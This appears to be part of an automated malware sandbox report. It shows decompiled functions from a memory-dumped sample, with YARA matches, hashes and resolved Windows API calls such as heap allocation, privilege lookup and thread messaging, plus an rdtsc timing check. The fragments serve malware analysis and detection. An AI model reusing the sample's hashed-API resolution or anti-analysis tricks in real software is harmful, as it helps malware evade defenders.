                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                        			E00409A90(intOrPtr* _a4) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				char _v284;
                                                                                                                                                        				char _v804;
                                                                                                                                                        				char _v840;
                                                                                                                                                        				void* _t24;
                                                                                                                                                        				void* _t31;
                                                                                                                                                        				void* _t33;
                                                                                                                                                        				void* _t34;
                                                                                                                                                        				void* _t39;
                                                                                                                                                        				void* _t50;
                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                        				void* _t53;
                                                                                                                                                        				void* _t54;
                                                                                                                                                        				void* _t55;
                                                                                                                                                        				void* _t56;
                                                                                                                                                        
                                                                                                                                                        				_t52 = _a4;
                                                                                                                                                        				_t39 = 0; // executed
                                                                                                                                                        				_t24 = E00407E80(_t52,  &_v24); // executed
                                                                                                                                                        				_t54 = _t53 + 8;
                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                        					E00408090( &_v24,  &_v840);
                                                                                                                                                        					_t55 = _t54 + 8;
                                                                                                                                                        					do {
                                                                                                                                                        						E0041B810( &_v284, 0x104);
                                                                                                                                                        						E0041BE80( &_v284,  &_v804);
                                                                                                                                                        						_t56 = _t55 + 0x10;
                                                                                                                                                        						_t50 = 0x4f;
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
                                                                                                                                                        							_t56 = _t56 + 0x10;
                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_t50 = _t50 + 1;
                                                                                                                                                        							if(_t50 <= 0x62) {
                                                                                                                                                        								continue;
                                                                                                                                                        							} else {
                                                                                                                                                        							}
                                                                                                                                                        							goto L8;
                                                                                                                                                        						}
                                                                                                                                                        						_t9 = _t52 + 0x14; // 0xffffe045
                                                                                                                                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                                        						_t39 = 1;
                                                                                                                                                        						L8:
                                                                                                                                                        						_t33 = E004080C0( &_v24,  &_v840);
                                                                                                                                                        						_t55 = _t56 + 8;
                                                                                                                                                        					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                        					_t34 = E00408140(_t52,  &_v24); // executed
                                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                                        						asm("rdtsc");
                                                                                                                                                        						asm("rdtsc");
                                                                                                                                                        						_v8 = _t34 - 0 + _t34;
                                                                                                                                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                                                                                                        					}
                                                                                                                                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                                                                                                        					return 1;
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t24;
                                                                                                                                                        				}
                                                                                                                                                        			}



















                                                                                                                                                        0x00409b2f
                                                                                                                                                        0x00409b31
                                                                                                                                                        0x00409b3c
                                                                                                                                                        0x00409b41
                                                                                                                                                        0x00409b44
                                                                                                                                                        0x00409b51
                                                                                                                                                        0x00409b5c
                                                                                                                                                        0x00409b5e
                                                                                                                                                        0x00409b64
                                                                                                                                                        0x00409b68
                                                                                                                                                        0x00409b6b
                                                                                                                                                        0x00409b6b
                                                                                                                                                        0x00409b72
                                                                                                                                                        0x00409b75
                                                                                                                                                        0x00409b7a
                                                                                                                                                        0x00409b87
                                                                                                                                                        0x00409ab6
                                                                                                                                                        0x00409ab6
                                                                                                                                                        0x00409ab6

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                                                                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                        			E0041A062(signed int __ecx, void* __edx, void* __edi, long _a4, void* _a8) {
                                                                                                                                                        				void* _v0;
                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                        				char _t16;
                                                                                                                                                        
                                                                                                                                                        				 *(__edx - 0x48) =  *(__edx - 0x48) | __ecx;
                                                                                                                                                        				asm("jecxz 0xffffffd2");
                                                                                                                                                        				asm("lodsd");
                                                                                                                                                        				_t13 = _v4;
                                                                                                                                                        				_push(_t25);
                                                                                                                                                        				_t6 = _t13 + 0xc74; // 0xc74
                                                                                                                                                        				E0041A960(__edi, _v4, _t6,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x35);
                                                                                                                                                        				_t16 = RtlFreeHeap(_v0, _a4, _a8); // executed
                                                                                                                                                        				return _t16;
                                                                                                                                                        			}







                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2488874121-0
                                                                                                                                                        • Opcode ID: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                                                                                                                        • Instruction ID: 9aec99f80d979829763f658558517c8ea97e6c987ab51b0632fcd2482d9baa97
                                                                                                                                                        • Opcode Fuzzy Hash: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                                                                                                                        • Instruction Fuzzy Hash: BB01F2B92052446FD714DF24DC81DDB7BA8EF85314F15898DF84817302C230E854CBB1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                        			E00408373(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, int _a8, long _a12, int _a16) {
                                                                                                                                                        				int _v8;
                                                                                                                                                        				char _v64;
                                                                                                                                                        				int _v132;
                                                                                                                                                        				int _v136;
                                                                                                                                                        				char _v656;
                                                                                                                                                        				int _v668;
                                                                                                                                                        				char _v684;
                                                                                                                                                        				char _v688;
                                                                                                                                                        				int __esi;
                                                                                                                                                        				void* __ebp;
                                                                                                                                                        				void* _t66;
                                                                                                                                                        				int _t67;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				long _t77;
                                                                                                                                                        				int _t81;
                                                                                                                                                        				void* _t83;
                                                                                                                                                        
                                                                                                                                                        				_t76 = __edi - 1;
                                                                                                                                                        				_t89 = _t76;
                                                                                                                                                        				if(_t76 < 0) {
                                                                                                                                                        					E0041C400( &_v64, 3);
                                                                                                                                                        					_t66 = E0040ACD0(_t89, _a8 + 0x1c,  &_v64); // executed
                                                                                                                                                        					_t67 = E00414E20(_a8 + 0x1c, _t66, 0, 0, 0xc4e7b6d6);
                                                                                                                                                        					_t81 = _t67;
                                                                                                                                                        					if(_t81 != 0) {
                                                                                                                                                        						_push(_t76);
                                                                                                                                                        						_t77 = _a12;
                                                                                                                                                        						_t67 = PostThreadMessageW(_t77, 0x111, 0, 0); // executed
                                                                                                                                                        						_t91 = _t67;
                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                        							_t67 =  *_t81(_t77, 0x8003, _t83 + (E0040A460(_t91, 1, 8) & 0x000000ff) - 0x40, _t67);
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					return _t67;
                                                                                                                                                        				} else {
                                                                                                                                                        					__al = __al ^ 0x0000006f;
                                                                                                                                                        					_t7 = __ecx + 0x40;
                                                                                                                                                        					_t8 = __ebx;
                                                                                                                                                        					__ebx =  *_t7;
                                                                                                                                                        					 *_t7 = _t8;
                                                                                                                                                        					asm("arpl [ebp+0x5518c14c], sp");
                                                                                                                                                        					_push(__ebp);
                                                                                                                                                        					__ebp = __esp;
                                                                                                                                                        					__esp = __esp - 0x2ac;
                                                                                                                                                        					_push(__ebx);
                                                                                                                                                        					_push(__esi);
                                                                                                                                                        					_push(__edi);
                                                                                                                                                        					__eax = 0;
                                                                                                                                                        					_v8 = 0;
                                                                                                                                                        					_v688 = 0;
                                                                                                                                                        					 &_v684 = E0041B860( &_v684, 0, 0x2a4);
                                                                                                                                                        					__esi = _a16;
                                                                                                                                                        					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                                                                                                                        					__edi = _a4;
                                                                                                                                                        					__eax = E004082F0(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                                                                                                                        					__eax = E0041B150(__ecx);
                                                                                                                                                        					_t17 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                                                                                                                        					__ebx = __eax + _t17;
                                                                                                                                                        					_a16 = 0;
                                                                                                                                                        					while(1) {
                                                                                                                                                        						__eax = E0040F640(__edi, 0xfe363c80); // executed
                                                                                                                                                        						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                                                                                                        						__eax =  &_v688;
                                                                                                                                                        						__eax = E00419F00(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                                                                                                                        						 *(__esi + 0x2dc) = __eax;
                                                                                                                                                        						__eflags = __eax;
                                                                                                                                                        						if(__eax < 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _v656;
                                                                                                                                                        						if(_v656 == 0) {
                                                                                                                                                        							L13:
                                                                                                                                                        							__eax = _a16;
                                                                                                                                                        							__eax = _a16 + 1;
                                                                                                                                                        							_a16 = __eax;
                                                                                                                                                        							__eflags = __eax - 2;
                                                                                                                                                        							if(__eax < 2) {
                                                                                                                                                        								continue;
                                                                                                                                                        							} else {
                                                                                                                                                        								__ebx = _v8;
                                                                                                                                                        								goto L17;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							__eflags = _v668;
                                                                                                                                                        							if(_v668 == 0) {
                                                                                                                                                        								goto L13;
                                                                                                                                                        							} else {
                                                                                                                                                        								__eflags = _v136;
                                                                                                                                                        								if(_v136 == 0) {
                                                                                                                                                        									goto L13;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v132;
                                                                                                                                                        									if(_v132 != 0) {
                                                                                                                                                        										__eax = _a12;
                                                                                                                                                        										__edx =  &_v688;
                                                                                                                                                        										__ebx = 1;
                                                                                                                                                        										__eax = E0041B7E0(_a12,  &_v688, 0x2a8);
                                                                                                                                                        										L17:
                                                                                                                                                        										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                                                                                                        										__eax = E00419E90(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                                                                                                                        										__eflags = __ebx;
                                                                                                                                                        										if(__ebx == 0) {
                                                                                                                                                        											break;
                                                                                                                                                        										} else {
                                                                                                                                                        											__edx = _v668;
                                                                                                                                                        											__eax = _a12;
                                                                                                                                                        											__ecx = _v136;
                                                                                                                                                        											 *(_a12 + 0x14) = _v668;
                                                                                                                                                        											__edx =  *(__esi + 0x2d0);
                                                                                                                                                        											_t37 = __esi + 0x2e8; // 0x2e8
                                                                                                                                                        											__eax = _t37;
                                                                                                                                                        											_push(__eax);
                                                                                                                                                        											 *__eax = _v136;
                                                                                                                                                        											__eax = _a12;
                                                                                                                                                        											_t39 = __esi + 0x314; // 0x314
                                                                                                                                                        											__ebx = _t39;
                                                                                                                                                        											_push(__ebx);
                                                                                                                                                        											__ecx = 0;
                                                                                                                                                        											_push( *(__esi + 0x2d0));
                                                                                                                                                        											__eax = _a12 + 0x220;
                                                                                                                                                        											_push(_a12 + 0x220);
                                                                                                                                                        											_push(__edi);
                                                                                                                                                        											 *__ebx = 0x18;
                                                                                                                                                        											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                                                                                                        											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                                                                                                        											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                                                                                                        											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                                                                                                        											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                                                                                                        											__eax = E00419710();
                                                                                                                                                        											__ecx = 0;
                                                                                                                                                        											__esp = __esp + 0x14;
                                                                                                                                                        											 *(__esi + 0x2dc) = __eax;
                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                        											if(__eax < 0) {
                                                                                                                                                        												break;
                                                                                                                                                        											} else {
                                                                                                                                                        												__edx = _v132;
                                                                                                                                                        												_t47 = __esi + 0x2e0; // 0x2e0
                                                                                                                                                        												__eax = _t47;
                                                                                                                                                        												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                                                                                                        												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                                                                                                        												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                                                                                                        												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                                                                                                        												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                                                                                                        												_a12 = _a12 + 0x224;
                                                                                                                                                        												 *(__esi + 0x2e4) = _v132;
                                                                                                                                                        												 *__ebx = 0x18;
                                                                                                                                                        												 *(__esi + 0x2d0) = 0x1a;
                                                                                                                                                        												__eax = E00419750(__edi, _a12 + 0x224, 0x1a, __ebx, _t47);
                                                                                                                                                        												 *(__esi + 0x2dc) = __eax;
                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                        												if(__eax < 0) {
                                                                                                                                                        													break;
                                                                                                                                                        												} else {
                                                                                                                                                        													__edx = _a8;
                                                                                                                                                        													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                                                                                                                                                        													__eflags =  *(__edx + 0x10) + 0x200;
                                                                                                                                                        													__eax = E0041ADF0(__ecx);
                                                                                                                                                        													__ebx = __eax;
                                                                                                                                                        													__eax =  *(__ebx + 0x28);
                                                                                                                                                        													__eax = E0041BAD0( *(__ebx + 0x28));
                                                                                                                                                        													__edx =  *(__ebx + 0x28);
                                                                                                                                                        													_t62 = __eax + 2; // 0x2
                                                                                                                                                        													__ecx = __eax + _t62;
                                                                                                                                                        													__eax =  &_v656;
                                                                                                                                                        													__eax = E00414A20(__edi,  &_v656, 2, 0); // executed
                                                                                                                                                        													_pop(__edi);
                                                                                                                                                        													_pop(__esi);
                                                                                                                                                        													_pop(__ebx);
                                                                                                                                                        													__esp = __ebp;
                                                                                                                                                        													_pop(__ebp);
                                                                                                                                                        													return __eax;
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									} else {
                                                                                                                                                        										goto L13;
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L21;
                                                                                                                                                        					}
                                                                                                                                                        					_pop(__edi);
                                                                                                                                                        					_pop(__esi);
                                                                                                                                                        					__eax = 0;
                                                                                                                                                        					__eflags = 0;
                                                                                                                                                        					_pop(__ebx);
                                                                                                                                                        					__esp = __ebp;
                                                                                                                                                        					_pop(__ebp);
                                                                                                                                                        					return 0;
                                                                                                                                                        				}
                                                                                                                                                        				L21:
                                                                                                                                                        			}



















                                                                                                                                                        0x004084a2
                                                                                                                                                        0x004084a5
                                                                                                                                                        0x004084a5
                                                                                                                                                        0x004084ab
                                                                                                                                                        0x004084ac
                                                                                                                                                        0x004084ae
                                                                                                                                                        0x004084af
                                                                                                                                                        0x004084b4
                                                                                                                                                        0x004084b5
                                                                                                                                                        0x004084b6
                                                                                                                                                        0x004084bc
                                                                                                                                                        0x004084c2
                                                                                                                                                        0x004084c8
                                                                                                                                                        0x004084ce
                                                                                                                                                        0x004084d4
                                                                                                                                                        0x004084da
                                                                                                                                                        0x004084df
                                                                                                                                                        0x004084e1
                                                                                                                                                        0x004084e4
                                                                                                                                                        0x004084ea
                                                                                                                                                        0x004084ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004084f2
                                                                                                                                                        0x004084f2
                                                                                                                                                        0x004084f5
                                                                                                                                                        0x004084f5
                                                                                                                                                        0x004084fc
                                                                                                                                                        0x00408502
                                                                                                                                                        0x00408508
                                                                                                                                                        0x0040850e
                                                                                                                                                        0x00408514
                                                                                                                                                        0x00408520
                                                                                                                                                        0x00408528
                                                                                                                                                        0x0040852e
                                                                                                                                                        0x00408534
                                                                                                                                                        0x0040853e
                                                                                                                                                        0x00408546
                                                                                                                                                        0x0040854c
                                                                                                                                                        0x0040854e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408554
                                                                                                                                                        0x00408554
                                                                                                                                                        0x0040855a
                                                                                                                                                        0x0040855a
                                                                                                                                                        0x00408560
                                                                                                                                                        0x0040856d
                                                                                                                                                        0x0040856f
                                                                                                                                                        0x00408573
                                                                                                                                                        0x00408578
                                                                                                                                                        0x0040857b
                                                                                                                                                        0x0040857b
                                                                                                                                                        0x0040858b
                                                                                                                                                        0x00408593
                                                                                                                                                        0x0040859b
                                                                                                                                                        0x0040859c
                                                                                                                                                        0x0040859d
                                                                                                                                                        0x0040859e
                                                                                                                                                        0x004085a0
                                                                                                                                                        0x004085a1
                                                                                                                                                        0x004085a1
                                                                                                                                                        0x0040854e
                                                                                                                                                        0x004084ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408434
                                                                                                                                                        0x0040842e
                                                                                                                                                        0x00408425
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040841c
                                                                                                                                                        0x00408447
                                                                                                                                                        0x00408448
                                                                                                                                                        0x00408449
                                                                                                                                                        0x00408449
                                                                                                                                                        0x0040844b
                                                                                                                                                        0x0040844c
                                                                                                                                                        0x0040844e
                                                                                                                                                        0x0040844f
                                                                                                                                                        0x0040844f
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: a390b28a58e7ae41994f6e424405bce2cf203896ccd39edfa2a2b5c8d00e25c4
                                                                                                                                                        • Instruction ID: dc6d07c72bb78a90db0061758641a327e1d61a1649643fe0ac9d2d05e9e25f21
                                                                                                                                                        • Opcode Fuzzy Hash: a390b28a58e7ae41994f6e424405bce2cf203896ccd39edfa2a2b5c8d00e25c4
                                                                                                                                                        • Instruction Fuzzy Hash: 1F61C570900309AFDB24DF64CC85FEB77A8EF44704F10446EF949A7281EB746941CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                        			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                        				char _v67;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				void* _t12;
                                                                                                                                                        				intOrPtr* _t13;
                                                                                                                                                        				int _t14;
                                                                                                                                                        				long _t21;
                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				void* _t30;
                                                                                                                                                        
                                                                                                                                                        				_t30 = __eflags;
                                                                                                                                                        				_v68 = 0;
                                                                                                                                                        				E0041B860( &_v67, 0, 0x3f);
                                                                                                                                                        				E0041C400( &_v68, 3);
                                                                                                                                                        				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                        				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                        				_t25 = _t13;
                                                                                                                                                        				if(_t25 != 0) {
                                                                                                                                                        					_t21 = _a8;
                                                                                                                                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                        					_t32 = _t14;
                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                        					}
                                                                                                                                                        					return _t14;
                                                                                                                                                        				}
                                                                                                                                                        				return _t13;
                                                                                                                                                        			}













                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                        • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                                                                                                                        • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                        • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                        				char _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                        				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                        				void* _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                        				int _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A0B0(intOrPtr _a4, int _a8) {
                                                                                                                                                        				void* _t10;
                                                                                                                                                        
                                                                                                                                                        				_t5 = _a4;
                                                                                                                                                        				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                        				ExitProcess(_a8);
                                                                                                                                                        			}





                                                                                                                                                        APIs
                                                                                                                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

